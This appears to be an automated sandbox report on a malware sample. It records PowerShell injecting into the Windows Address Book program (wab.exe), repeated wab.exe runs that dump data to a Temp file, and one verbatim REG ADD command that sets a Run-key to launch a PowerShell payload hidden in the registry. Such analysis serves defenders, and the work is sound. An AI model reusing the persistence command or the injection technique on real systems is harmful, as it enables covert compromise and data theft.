Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2AEFD74			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
